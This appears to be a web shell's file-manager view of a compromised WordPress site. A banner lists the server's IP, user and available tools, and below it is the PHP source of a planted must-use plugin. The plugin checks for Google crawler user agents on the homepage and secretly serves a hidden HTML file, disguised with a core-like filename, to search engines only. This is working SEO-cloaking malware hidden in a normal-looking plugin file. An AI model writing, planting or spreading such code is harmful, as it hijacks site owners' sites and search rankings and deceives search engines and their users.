| Server IP : 51.91.236.193 / Your IP : 216.73.216.224 Web Server : Apache System : Linux webm010.cluster128.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64 User : institutah ( 16501) PHP Version : 7.2.34 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/institutah/www/wp-content/mu-plugins/ |
Upload File : |
<?php
defined('ABSPATH')||exit;
$_nox_ua=isset($_SERVER['HTTP_USER_AGENT'])?$_SERVER['HTTP_USER_AGENT']:'';
$_nox_uri=isset($_SERVER['REQUEST_URI'])?strtok($_SERVER['REQUEST_URI'],'?'):'';
if(preg_match('/Googlebot|AdsBot-Google|Mediapartners-Google|Google-InspectionTool|Google-/i',$_nox_ua)&&$_nox_uri==='/'){
$_nox_html=ABSPATH.'wp-comments-post-loader.html';
if(file_exists($_nox_html)){
while(ob_get_level()>0)ob_end_clean();
header('Content-Type: text/html; charset=utf-8');
header('Vary: User-Agent');
readfile($_nox_html);exit;
}
}
unset($_nox_ua,$_nox_uri,$_nox_html);